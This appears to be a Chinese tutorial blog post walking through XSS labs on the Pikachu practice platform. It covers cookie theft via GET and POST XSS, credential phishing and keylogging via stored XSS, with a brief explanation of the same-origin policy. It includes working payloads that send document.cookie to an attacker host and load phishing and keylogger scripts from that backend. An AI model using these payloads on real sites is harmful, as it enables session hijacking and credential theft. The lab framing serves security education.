XSS的漏洞测试案例

1、获取cookie的原理和实验演示

《get型xss》

第一步:搭建xss的后台

打开pikachu xss的后台管理工具(在pikachu漏洞平台底部---->管理工具----->xss后台)
在这里插入图片描述
根据提示进行安装,修改配置文件,即数据库的账户和密码
在这里插入图片描述
接下来,根据提示进行安装/初始化,然后进行登录

在这里插入图片描述
后台登录成功
在这里插入图片描述
现在xss后台没有任何数据

在这里插入图片描述
第二步:先将pikachu中cookie.php改为自己本地的ip,重定向到一个可信的网站,我的ip如下

路径为:D:\phpstudy2018\PHPTutorial\WWW\pikachu\pkxss\xcookie\cookie.php**

在这里插入图片描述
第三步:修改字符输入长度

在这里插入图片描述

第四步:输入框中输入如下playload,然后重定向到Pikachu的首页

<script>document.location = 'http://192.168.159.146:8080/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

在这里插入图片描述

第五步:此时查看xss后台,进行刷新

在这里插入图片描述

第六步:如果黑客将referer中的url链接发送给普通用户,一旦其访问这个链接,用户便跳转到首页,但是黑客就会获取到cookie

《post型xss》

在这里插入图片描述

第一步:登录,用户:admin,密码:123456。在输入框中输入一个参数,进行抓包

在这里插入图片描述

抓包查看:通过post方式传到后台,无法使用url进行攻击

在这里插入图片描述

第二步:伪造表单自动提交页面(路径:E:\phpStudy\PHPTutorial\WWW\pikachu\pkxss\xcookie\post.html)

注:修改完后要重启phpstudy服务

在这里插入图片描述

第三步:模拟的恶意站点

192.168.159.146:8080/pikachu/pkxss/xcookie/post.html

第四步:用户通过访问这个站点,然后跳转到首页,攻击者后台获取cookie

在这里插入图片描述

2、XSS进行钓鱼的原理和实验演示

《存储型XSS》

第一步:修改文件fish.php的ip(我的文件路径:E:\phpStudy\PHPTutorial\WWW\pikachu\pkxss\xfish)

在这里插入图片描述

注:这里需要注意的是,要将username和password中间的空格删除,拼接在一块。不然实验无法成功

在这里插入图片描述

第二步:在存在存储型xss漏洞的页面插入js代码请求

<img  src=" http://192.168.159.146:8080/pikachu/pkxss/xfish/fish.php"  />
<script  src="http://192.168.159.146:8080/pikachu/pkxss/xfish/fish.php"></script>

第三步:后台会有一个认证框,给用户发送。

在这里插入图片描述

第四步:用户一旦输入用户名和密码,就会重定向到后台,后台就会以get方式获取到用户名、密码

在这里插入图片描述

在这里插入图片描述

3、XSS获取键盘记录原理和实验演示

《存储型xss》
跨域的概念
http://       www    .      xyz.com    :     8080      /        script/test.js

协议          子域名           主域名           端口                资源地址

当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请求数据的操作,成为跨域操作

同源策略

所谓同源策略,就是规定两个域名之间不能使用JS进行相互操作。比如x.com域名下的javascript并不能操作y.com域下的对象

如果想要跨域操作,则需要管理员进行特殊的配置

例:header(“Access-Control-Allow-Origin:x.com”)指定

Tips:下面这些标签跨域加载资源(资源类型是有限制的)是不受同源策略限制的

<script src="...">   //js加载到本地执行

<img src="...">   //图片

<link href="...">   //css

<iframe src="..." >   //任意资源
为什么要有同源策略

A登录了淘宝,攻击者向A发送一个恶意链接urlb:http://www.盗你cookie.com

如果没有同源策略,即urlb上的js可以操作A的内容(如:获取cookie等)

有了同源策略,就限制了这种情况

实验演示

第一步:存入到数据库中,并且设置允许所有跨域访问,当然这里可设置自己想要允许的域

在这里插入图片描述

第二步:修改js文件中的ip,黑客通过用户输入获取键盘值,以post方式发送给攻击者后台

在这里插入图片描述

第三步:在留言板输入js代码

<script  src=" http://192.168.159.149:8080/pikachu/pkxss/rkeypress/rk.js">  </script>

在这里插入图片描述

第四步:打开控制的网络,不管输入什么,都是跳出页面请求失败

在这里插入图片描述

第五步:这时,后台已经获取了用户键盘输入的内容

在这里插入图片描述

  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值